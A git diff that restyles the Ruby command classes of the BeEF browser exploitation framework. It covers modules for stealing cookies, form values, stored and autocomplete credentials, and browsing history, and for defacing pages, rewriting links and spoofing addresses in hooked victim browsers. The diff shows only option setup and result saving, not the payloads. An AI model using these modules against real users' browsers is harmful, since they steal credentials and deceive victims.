diff --git a/modules/browser/avant_steal_history/module.rb b/modules/browser/avant_steal_history/module.rb index c3e79115c..73526330d 100644 --- a/modules/browser/avant_steal_history/module.rb +++ b/modules/browser/avant_steal_history/module.rb @@ -14,20 +14,13 @@ # limitations under the License. # class Avant_steal_history < BeEF::Core::Command + def self.options + [ + { 'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' } + ] + end - def self.options - - configuration = BeEF::Core::Configuration.instance - - - return [ - {'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' } - ] - - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/browser/browser_fingerprinting/module.rb b/modules/browser/browser_fingerprinting/module.rb index 18baa64e1..a766a500b 100644 --- a/modules/browser/browser_fingerprinting/module.rb +++ b/modules/browser/browser_fingerprinting/module.rb @@ -7,15 +7,11 @@ # http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/ class Browser_fingerprinting < BeEF::Core::Command - def post_execute content = {} - content['browser_type'] = @datastore['browser_type'] if not @datastore['browser_type'].nil? - content['browser_version'] = @datastore['browser_version'] if not @datastore['browser_version'].nil? - if content.empty? - content['fail'] = 'Failed to fingerprint browser.' - end + content['browser_type'] = @datastore['browser_type'] unless @datastore['browser_type'].nil? + content['browser_version'] = @datastore['browser_version'] unless @datastore['browser_version'].nil? + content['fail'] = 'Failed to fingerprint browser.' if content.empty? save content end - end diff --git a/modules/browser/detect_activex/module.rb b/modules/browser/detect_activex/module.rb index 16c2578cb..23ca8f2bc 100644 --- a/modules/browser/detect_activex/module.rb +++ b/modules/browser/detect_activex/module.rb @@ -4,14 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Detect_activex < BeEF::Core::Command + def post_execute + content = {} + content['activex'] = @datastore['activex'] + save content - def post_execute - content = {} - content['activex'] = @datastore['activex'] - save content - if @datastore['results'] =~ /^activex=(Yes|No)/ - bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.activex', $1) - end - end + activex = @datastore['results'].scan(/^activex=(Yes|No)/).flatten.first + return unless activex + BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.activex', activex) + end end diff --git a/modules/browser/detect_evernote_clipper/module.rb b/modules/browser/detect_evernote_clipper/module.rb index 9a15e758a..d74ddd4bb 100644 --- a/modules/browser/detect_evernote_clipper/module.rb +++ b/modules/browser/detect_evernote_clipper/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_evernote_clipper < BeEF::Core::Command - - def post_execute - content = {} - content['evernote_clipper'] = @datastore['evernote_clipper'] if not @datastore['evernote_clipper'].nil? - save content - end - + def post_execute + content = {} + content['evernote_clipper'] = @datastore['evernote_clipper'] unless @datastore['evernote_clipper'].nil? + save content + end end diff --git a/modules/browser/detect_extensions/module.rb b/modules/browser/detect_extensions/module.rb index b2bbe45f7..70ea5edbf 100644 --- a/modules/browser/detect_extensions/module.rb +++ b/modules/browser/detect_extensions/module.rb @@ -8,12 +8,9 @@ # http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html # class Detect_extensions < BeEF::Core::Command - def post_execute content = {} content['extension'] = @datastore['extension'] save content end - end - diff --git a/modules/browser/detect_firebug/module.rb b/modules/browser/detect_firebug/module.rb index a934eadb7..20401e5c2 100644 --- a/modules/browser/detect_firebug/module.rb +++ b/modules/browser/detect_firebug/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_firebug < BeEF::Core::Command - - def post_execute - content = {} - content['firebug'] = @datastore['firebug'] if not @datastore['firebug'].nil? - save content - end - + def post_execute + content = {} + content['firebug'] = @datastore['firebug'] unless @datastore['firebug'].nil? + save content + end end diff --git a/modules/browser/detect_foxit/module.rb b/modules/browser/detect_foxit/module.rb index 9f0eee4b6..23e17db62 100644 --- a/modules/browser/detect_foxit/module.rb +++ b/modules/browser/detect_foxit/module.rb @@ -4,14 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Detect_foxit < BeEF::Core::Command - - def post_execute - content = {} - content['foxit'] = @datastore['foxit'] - save content - if @datastore['results'] =~ /^foxit=(Yes|No)/ - bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasFoxit', $1) - end - end - + def post_execute + content = {} + content['foxit'] = @datastore['foxit'] + save content + BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasFoxit', Regexp.last_match(1)) if @datastore['results'] =~ /^foxit=(Yes|No)/ + end end diff --git a/modules/browser/detect_lastpass/module.rb b/modules/browser/detect_lastpass/module.rb index 60fb37ade..0d2416c30 100644 --- a/modules/browser/detect_lastpass/module.rb +++ b/modules/browser/detect_lastpass/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_lastpass < BeEF::Core::Command - - def post_execute - content = {} - content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil? - save content - end - + def post_execute + content = {} + content['lastpass'] = @datastore['lastpass'] unless @datastore['lastpass'].nil? + save content + end end diff --git a/modules/browser/detect_office/module.rb b/modules/browser/detect_office/module.rb index 8e13aff87..6fabec834 100644 --- a/modules/browser/detect_office/module.rb +++ b/modules/browser/detect_office/module.rb @@ -4,14 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Detect_office < BeEF::Core::Command - - def post_execute - content = {} - content['office'] = @datastore['office'] - save content - if @datastore['results'] =~ /^office=Office (\d+|Xp)/ - bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasOffice', $1) - end - end - + def post_execute + content = {} + content['office'] = @datastore['office'] + save content + BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasOffice', Regexp.last_match(1)) if @datastore['results'] =~ /^office=Office (\d+|Xp)/ + end end diff --git a/modules/browser/detect_popup_blocker/module.rb b/modules/browser/detect_popup_blocker/module.rb index c19cf73cc..869920135 100644 --- a/modules/browser/detect_popup_blocker/module.rb +++ b/modules/browser/detect_popup_blocker/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_popup_blocker < BeEF::Core::Command - def post_execute content = {} content['popup_blocker_enabled'] = @datastore['popup_blocker_enabled'] save content end - end diff --git a/modules/browser/detect_quicktime/module.rb b/modules/browser/detect_quicktime/module.rb index b641d1190..ee73d6b1e 100644 --- a/modules/browser/detect_quicktime/module.rb +++ b/modules/browser/detect_quicktime/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_quicktime < BeEF::Core::Command - - def post_execute - content = {} - content['quicktime'] = @datastore['quicktime'] - save content - end - + def post_execute + content = {} + content['quicktime'] = @datastore['quicktime'] + save content + end end diff --git a/modules/browser/detect_realplayer/module.rb b/modules/browser/detect_realplayer/module.rb index f738512dd..22390fb65 100644 --- a/modules/browser/detect_realplayer/module.rb +++ b/modules/browser/detect_realplayer/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_realplayer < BeEF::Core::Command - - def post_execute - content = {} - content['realplayer'] = @datastore['realplayer'] - save content - end - + def post_execute + content = {} + content['realplayer'] = @datastore['realplayer'] + save content + end end diff --git a/modules/browser/detect_silverlight/module.rb b/modules/browser/detect_silverlight/module.rb index cf8ac3537..450adc7f5 100644 --- a/modules/browser/detect_silverlight/module.rb +++ b/modules/browser/detect_silverlight/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_silverlight < BeEF::Core::Command - - def post_execute - content = {} - content['silverlight'] = @datastore['silverlight'] - save content - end - + def post_execute + content = {} + content['silverlight'] = @datastore['silverlight'] + save content + end end diff --git a/modules/browser/detect_simple_adblock/module.rb b/modules/browser/detect_simple_adblock/module.rb index 09786949c..f56205757 100644 --- a/modules/browser/detect_simple_adblock/module.rb +++ b/modules/browser/detect_simple_adblock/module.rb @@ -3,12 +3,10 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # -class Detect_simple_adblock< BeEF::Core::Command - - def post_execute - content = {} - content['simple_adblock'] = @datastore['simple_adblock'] if not @datastore['simple_adblock'].nil? - save content - end - +class Detect_simple_adblock < BeEF::Core::Command + def post_execute + content = {} + content['simple_adblock'] = @datastore['simple_adblock'] unless @datastore['simple_adblock'].nil? + save content + end end diff --git a/modules/browser/detect_toolbars/module.rb b/modules/browser/detect_toolbars/module.rb index c2cf1b966..54e849496 100644 --- a/modules/browser/detect_toolbars/module.rb +++ b/modules/browser/detect_toolbars/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_toolbars < BeEF::Core::Command - def post_execute content = {} content['toolbars'] = @datastore['toolbars'] save content end - -end \ No newline at end of file +end diff --git a/modules/browser/detect_unity/module.rb b/modules/browser/detect_unity/module.rb index 0904a7d9e..98ee69f82 100644 --- a/modules/browser/detect_unity/module.rb +++ b/modules/browser/detect_unity/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_unity < BeEF::Core::Command - def post_execute content = {} content['unity'] = @datastore['unity'] save content end - end diff --git a/modules/browser/detect_unsafe_activex/module.rb b/modules/browser/detect_unsafe_activex/module.rb index 3acdf0a9e..d99c6dbee 100644 --- a/modules/browser/detect_unsafe_activex/module.rb +++ b/modules/browser/detect_unsafe_activex/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_unsafe_activex < BeEF::Core::Command - - def post_execute - content = {} - content['unsafe_activex'] = @datastore['unsafe_activex'] - save content - end - + def post_execute + content = {} + content['unsafe_activex'] = @datastore['unsafe_activex'] + save content + end end diff --git a/modules/browser/detect_vlc/module.rb b/modules/browser/detect_vlc/module.rb index 107e0279b..836a8f464 100644 --- a/modules/browser/detect_vlc/module.rb +++ b/modules/browser/detect_vlc/module.rb @@ -4,14 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Detect_vlc < BeEF::Core::Command - def post_execute content = {} content['vlc'] = @datastore['vlc'] save content - if @datastore['results'] =~ /^vlc=(Yes|No)/ - bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.vlc', $1) - end + BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.vlc', Regexp.last_match(1)) if @datastore['results'] =~ /^vlc=(Yes|No)/ end - end diff --git a/modules/browser/detect_wmp/module.rb b/modules/browser/detect_wmp/module.rb index ea4cc9f8a..eec8e6ff4 100644 --- a/modules/browser/detect_wmp/module.rb +++ b/modules/browser/detect_wmp/module.rb @@ -4,14 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Detect_wmp < BeEF::Core::Command - - def post_execute - content = {} - content['wmp'] = @datastore['wmp'] - save content - if @datastore['results'] =~ /^wmp=(Yes|No)/ - bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.wmp', $1) - end - end - + def post_execute + content = {} + content['wmp'] = @datastore['wmp'] + save content + BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.wmp', Regexp.last_match(1)) if @datastore['results'] =~ /^wmp=(Yes|No)/ + end end diff --git a/modules/browser/fingerprint_browser/module.rb b/modules/browser/fingerprint_browser/module.rb index 2cdeb1277..190d9b661 100644 --- a/modules/browser/fingerprint_browser/module.rb +++ b/modules/browser/fingerprint_browser/module.rb @@ -5,15 +5,11 @@ # class Fingerprint_browser < BeEF::Core::Command - def post_execute content = {} content['fingerprint'] = @datastore['fingerprint'] unless @datastore['fingerprint'].nil? content['components'] = @datastore['components'] unless @datastore['components'].nil? - if content.empty? - content['fail'] = 'Failed to fingerprint browser.' - end + content['fail'] = 'Failed to fingerprint browser.' if content.empty? save content end - end diff --git a/modules/browser/get_visited_domains/module.rb b/modules/browser/get_visited_domains/module.rb index fc972abe3..16b229043 100644 --- a/modules/browser/get_visited_domains/module.rb +++ b/modules/browser/get_visited_domains/module.rb @@ -5,11 +5,10 @@ # class Get_visited_domains < BeEF::Core::Command - def self.options - return [{ - 'name' => 'domains', - 'description' => 'Specify additional resources to fetch during visited domains analysis. Paste to the below field full URLs leading to CSS, image, JS or other *static* resources hosted on desired page. Separate domain names with url by using semicolon (;). Next domains separate by comma (,).', + [{ + 'name' => 'domains', + 'description' => 'Specify additional resources to fetch during visited domains analysis. Paste to the below field full URLs leading to CSS, image, JS or other *static* resources hosted on desired page. Separate domain names with url by using semicolon (;). Next domains separate by comma (,).', 'type' => 'textarea', 'ui_label' => 'Specify custom page to check', 'value' => 'Github ; https://assets-cdn.github.com/favicon.ico,', @@ -23,5 +22,4 @@ class Get_visited_domains < BeEF::Core::Command content['results'] = @datastore['results'] save content end - end diff --git a/modules/browser/get_visited_urls/module.rb b/modules/browser/get_visited_urls/module.rb index 1a6e3e219..c8510cd19 100644 --- a/modules/browser/get_visited_urls/module.rb +++ b/modules/browser/get_visited_urls/module.rb @@ -4,20 +4,18 @@ # See the file 'doc/COPYING' for copying permission # class Get_visited_urls < BeEF::Core::Command - def self.options - return [ - { 'ui_label'=>'URL(s)', - 'name'=>'urls', - 'description' => 'Enter target URL(s)', - 'type'=>'textarea', - 'value'=>'http://beefproject.com/', - 'width'=>'200px' } + [ + { 'ui_label' => 'URL(s)', + 'name' => 'urls', + 'description' => 'Enter target URL(s)', + 'type' => 'textarea', + 'value' => 'http://beefproject.com/', + 'width' => '200px' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/browser/hooked_domain/ajax_fingerprint/module.rb b/modules/browser/hooked_domain/ajax_fingerprint/module.rb index 402babc41..25c88c2d9 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/module.rb +++ b/modules/browser/hooked_domain/ajax_fingerprint/module.rb @@ -5,14 +5,10 @@ # class Ajax_fingerprint < BeEF::Core::Command - def post_execute - content = {} - content['script_urls'] = @datastore['script_urls'] if not @datastore['script_urls'].nil? - if content.empty? - content['fail'] = 'Failed to fingerprint ajax.' - end - save content + content = {} + content['script_urls'] = @datastore['script_urls'] unless @datastore['script_urls'].nil? + content['fail'] = 'Failed to fingerprint ajax.' if content.empty? + save content end - end diff --git a/modules/browser/hooked_domain/alert_dialog/module.rb b/modules/browser/hooked_domain/alert_dialog/module.rb index 2641f3408..e6a0df122 100644 --- a/modules/browser/hooked_domain/alert_dialog/module.rb +++ b/modules/browser/hooked_domain/alert_dialog/module.rb @@ -4,23 +4,21 @@ # See the file 'doc/COPYING' for copying permission # class Alert_dialog < BeEF::Core::Command - - # set and return all options for this module + # set and return all options for this module def self.options - return [{ - 'name' => 'text', - 'description' => 'Sends an alert dialog to the victim', + [{ + 'name' => 'text', + 'description' => 'Sends an alert dialog to the victim', 'type' => 'textarea', 'ui_label' => 'Alert text', 'value' => 'BeEF Alert Dialog', - 'width' => '400px' - }] + 'width' => '400px' + }] end - def post_execute + def post_execute content = {} content['User Response'] = "The user clicked the 'OK' button when presented with an alert box." save content end - end diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb index dd16c5912..d3a260e17 100644 --- a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb +++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb @@ -4,16 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Apache_tomcat_examples_cookie_disclosure < BeEF::Core::Command - def self.options [ - {'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample'}, + { 'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample' } ] end - def post_execute - content = {} - content['cookies'] = @datastore['cookies'] - save content - end + def post_execute + content = {} + content['cookies'] = @datastore['cookies'] + save content + end end diff --git a/modules/browser/hooked_domain/clear_console/module.rb b/modules/browser/hooked_domain/clear_console/module.rb index 41965161a..99d0ce2dc 100644 --- a/modules/browser/hooked_domain/clear_console/module.rb +++ b/modules/browser/hooked_domain/clear_console/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Clear_console < BeEF::Core::Command - def post_execute content = {} content['result'] = @datastore['result'] save content end - end diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_domain/deface_web_page/module.rb index 3fe80c63c..eeb239a91 100644 --- a/modules/browser/hooked_domain/deface_web_page/module.rb +++ b/modules/browser/hooked_domain/deface_web_page/module.rb @@ -4,19 +4,20 @@ # See the file 'doc/COPYING' for copying permission # class Deface_web_page < BeEF::Core::Command - def self.options - @configuration = BeEF::Core::Configuration.instance - proto = @configuration.beef_proto - beef_host = @configuration.beef_host - beef_port = @configuration.beef_port - base_host = "#{proto}://#{beef_host}:#{beef_port}" + @configuration = BeEF::Core::Configuration.instance + proto = @configuration.beef_proto + beef_host = @configuration.beef_host + beef_port = @configuration.beef_port + base_host = "#{proto}://#{beef_host}:#{beef_port}" - favicon_uri = "#{base_host}/ui/media/images/favicon.ico" - return [ - { 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' }, - { 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' }, - { 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label'=>'Deface Content', 'type' => 'textarea', 'value' =>'BeEF!', 'width' => '400px', 'height' => '100px' } + favicon_uri = "#{base_host}/ui/media/images/favicon.ico" + [ + { 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', + 'width' => '200px' }, + { 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width' => '200px' }, + { 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label' => 'Deface Content', 'type' => 'textarea', 'value' => 'BeEF!', 'width' => '400px', + 'height' => '100px' } ] end @@ -24,7 +25,5 @@ class Deface_web_page < BeEF::Core::Command content = {} content['Result'] = @datastore['result'] save content - end - end diff --git a/modules/browser/hooked_domain/deface_web_page_component/module.rb b/modules/browser/hooked_domain/deface_web_page_component/module.rb index b578ed4c9..13d2203af 100644 --- a/modules/browser/hooked_domain/deface_web_page_component/module.rb +++ b/modules/browser/hooked_domain/deface_web_page_component/module.rb @@ -4,11 +4,11 @@ # See the file 'doc/COPYING' for copying permission # class Deface_web_page_component < BeEF::Core::Command - def self.options - return [ - { 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle', 'width'=>'200px' }, - { 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width'=>'200px' } + [ + { 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle', + 'width' => '200px' }, + { 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width' => '200px' } ] end @@ -16,7 +16,5 @@ class Deface_web_page_component < BeEF::Core::Command content = {} content['Result'] = @datastore['result'] save content - end - end diff --git a/modules/browser/hooked_domain/disable_developer_tools/module.rb b/modules/browser/hooked_domain/disable_developer_tools/module.rb index f4672fb60..ca8998660 100644 --- a/modules/browser/hooked_domain/disable_developer_tools/module.rb +++ b/modules/browser/hooked_domain/disable_developer_tools/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Disable_developer_tools < BeEF::Core::Command - def post_execute content = {} content['result'] = @datastore['result'] save content end - end diff --git a/modules/browser/hooked_domain/get_autocomplete_creds/module.rb b/modules/browser/hooked_domain/get_autocomplete_creds/module.rb index 4ffbf7aa9..2dc191452 100644 --- a/modules/browser/hooked_domain/get_autocomplete_creds/module.rb +++ b/modules/browser/hooked_domain/get_autocomplete_creds/module.rb @@ -4,14 +4,13 @@ # See the file 'doc/COPYING' for copying permission # class Get_autocomplete_creds < BeEF::Core::Command - def self.options - [] - end + def self.options + [] + end - def post_execute - content = {} - content['results'] = @datastore['results'] - save content - end + def post_execute + content = {} + content['results'] = @datastore['results'] + save content + end end - diff --git a/modules/browser/hooked_domain/get_cookie/module.rb b/modules/browser/hooked_domain/get_cookie/module.rb index d7691c076..de1cbe5bc 100644 --- a/modules/browser/hooked_domain/get_cookie/module.rb +++ b/modules/browser/hooked_domain/get_cookie/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Get_cookie < BeEF::Core::Command - def post_execute content = {} content['cookie'] = @datastore['cookie'] save content end - end diff --git a/modules/browser/hooked_domain/get_form_values/module.rb b/modules/browser/hooked_domain/get_form_values/module.rb index 51388b577..c0f4306be 100644 --- a/modules/browser/hooked_domain/get_form_values/module.rb +++ b/modules/browser/hooked_domain/get_form_values/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Get_form_values < BeEF::Core::Command - - def post_execute - content = {} - content['result'] = @datastore['result'] - save content - end - + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end end diff --git a/modules/browser/hooked_domain/get_local_storage/module.rb b/modules/browser/hooked_domain/get_local_storage/module.rb index 1828ba570..764def331 100644 --- a/modules/browser/hooked_domain/get_local_storage/module.rb +++ b/modules/browser/hooked_domain/get_local_storage/module.rb @@ -4,16 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Get_local_storage < BeEF::Core::Command - # More info: # http://dev.w3.org/html5/webstorage/ # http://diveintohtml5.org/storage.html # - + def post_execute content = {} content['localStorage'] = @datastore['localStorage'] save content end - end diff --git a/modules/browser/hooked_domain/get_page_html/module.rb b/modules/browser/hooked_domain/get_page_html/module.rb index cf5a3a8c9..4a97da84b 100644 --- a/modules/browser/hooked_domain/get_page_html/module.rb +++ b/modules/browser/hooked_domain/get_page_html/module.rb @@ -4,12 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Get_page_html < BeEF::Core::Command - def post_execute content = {} content['head'] = @datastore['head'] content['body'] = @datastore['body'] save content end - end diff --git a/modules/browser/hooked_domain/get_page_html_iframe/module.rb b/modules/browser/hooked_domain/get_page_html_iframe/module.rb index 08d34d680..d01ac82b8 100644 --- a/modules/browser/hooked_domain/get_page_html_iframe/module.rb +++ b/modules/browser/hooked_domain/get_page_html_iframe/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Get_page_html_iframe < BeEF::Core::Command - def post_execute content = {} content['head'] = @datastore['head'] @@ -12,5 +11,4 @@ class Get_page_html_iframe < BeEF::Core::Command content['iframe_'] = @datastore['iframe_'] save content end - end diff --git a/modules/browser/hooked_domain/get_page_links/module.rb b/modules/browser/hooked_domain/get_page_links/module.rb index 06879c368..ad53a6e5b 100644 --- a/modules/browser/hooked_domain/get_page_links/module.rb +++ b/modules/browser/hooked_domain/get_page_links/module.rb @@ -4,12 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Get_page_links < BeEF::Core::Command - def post_execute content = {} content['links'] = @datastore['links'] save content end - end diff --git a/modules/browser/hooked_domain/get_session_storage/module.rb b/modules/browser/hooked_domain/get_session_storage/module.rb index 369a43784..858c7be1a 100644 --- a/modules/browser/hooked_domain/get_session_storage/module.rb +++ b/modules/browser/hooked_domain/get_session_storage/module.rb @@ -4,16 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Get_session_storage < BeEF::Core::Command - # More info: # http://dev.w3.org/html5/webstorage/ # http://diveintohtml5.org/storage.html # - + def post_execute content = {} content['sessionStorage'] = @datastore['sessionStorage'] save content end - end diff --git a/modules/browser/hooked_domain/get_stored_credentials/module.rb b/modules/browser/hooked_domain/get_stored_credentials/module.rb index ee5467dc5..75a4a668e 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/module.rb +++ b/modules/browser/hooked_domain/get_stored_credentials/module.rb @@ -4,24 +4,22 @@ # See the file 'doc/COPYING' for copying permission # class Get_stored_credentials < BeEF::Core::Command + def self.options + @configuration = BeEF::Core::Configuration.instance + proto = @configuration.beef_proto + beef_host = @configuration.beef_host + beef_port = @configuration.beef_port + base_host = "#{proto}://#{beef_host}:#{beef_port}" - def self.options - @configuration = BeEF::Core::Configuration.instance - proto = @configuration.beef_proto - beef_host = @configuration.beef_host - beef_port = @configuration.beef_port - base_host = "#{proto}://#{beef_host}:#{beef_port}" - - uri = "#{base_host}/demos/butcher/index.html" - return [ - { 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width'=>'400px' } - ] - end - - def post_execute - content = {} - content['form_data'] = @datastore['form_data'] - save content - end + uri = "#{base_host}/demos/butcher/index.html" + [ + { 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width' => '400px' } + ] + end + def post_execute + content = {} + content['form_data'] = @datastore['form_data'] + save content + end end diff --git a/modules/browser/hooked_domain/link_rewrite/module.rb b/modules/browser/hooked_domain/link_rewrite/module.rb index ccdee148f..d103bf9fe 100644 --- a/modules/browser/hooked_domain/link_rewrite/module.rb +++ b/modules/browser/hooked_domain/link_rewrite/module.rb @@ -4,15 +4,13 @@ # See the file 'doc/COPYING' for copying permission # class Link_rewrite < BeEF::Core::Command - def self.options - return [ - { 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' } + [ + { 'ui_label' => 'URL', 'name' => 'url', 'description' => 'Target URL', 'value' => 'http://beefproject.com/', 'width' => '200px' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/browser/hooked_domain/link_rewrite_click_events/module.rb b/modules/browser/hooked_domain/link_rewrite_click_events/module.rb index 026bbd791..97dc3c7af 100644 --- a/modules/browser/hooked_domain/link_rewrite_click_events/module.rb +++ b/modules/browser/hooked_domain/link_rewrite_click_events/module.rb @@ -4,15 +4,13 @@ # See the file 'doc/COPYING' for copying permission # class Link_rewrite_click_events < BeEF::Core::Command - def self.options - return [ - { 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' } + [ + { 'ui_label' => 'URL', 'name' => 'url', 'description' => 'Target URL', 'value' => 'http://beefproject.com/', 'width' => '200px' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb index 703a195a5..efa0e4ff9 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb @@ -4,9 +4,7 @@ # See the file 'doc/COPYING' for copying permission # class Link_rewrite_sslstrip < BeEF::Core::Command - def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/browser/hooked_domain/link_rewrite_tel/module.rb b/modules/browser/hooked_domain/link_rewrite_tel/module.rb index d4fa97a69..dc0f55d52 100644 --- a/modules/browser/hooked_domain/link_rewrite_tel/module.rb +++ b/modules/browser/hooked_domain/link_rewrite_tel/module.rb @@ -4,15 +4,13 @@ # See the file 'doc/COPYING' for copying permission # class Link_rewrite_tel < BeEF::Core::Command - def self.options - return [ - { 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' } + [ + { 'ui_label' => 'Number', 'name' => 'tel_number', 'description' => 'New telephone number', 'value' => '5558585', 'width' => '200px' } ] end - + def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb index 910868002..4667f314f 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb @@ -4,21 +4,18 @@ # See the file 'doc/COPYING' for copying permission # class Mobilesafari_address_spoofing < BeEF::Core::Command + def self.options + [ + { 'name' => 'fake_url', 'ui_label' => 'Fake URL', 'type' => 'text', 'value' => 'http://en.wikipedia.org/wiki/Beef' }, + { 'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'http://www.beefproject.com' }, + { 'name' => 'domselectah', 'ui_label' => 'jQuery Selector for Link rewriting. \'a\' will overwrite all links', 'type' => 'text', 'value' => 'a' } + ] + end - def self.options - return [ - {'name' => 'fake_url', 'ui_label' => 'Fake URL', 'type' => 'text', 'value' =>'http://en.wikipedia.org/wiki/Beef'}, - {'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'http://www.beefproject.com'}, - {'name' => 'domselectah', 'ui_label' => 'jQuery Selector for Link rewriting. \'a\' will overwrite all links', 'type' => 'text', 'value' => 'a'} - ] - end - - def post_execute - content = {} - content['results'] = @datastore['results'] - content['query'] = @datastore['query'] - save content - end - + def post_execute + content = {} + content['results'] = @datastore['results'] + content['query'] = @datastore['query'] + save content + end end - diff --git a/modules/browser/hooked_domain/overflow_cookiejar/module.rb 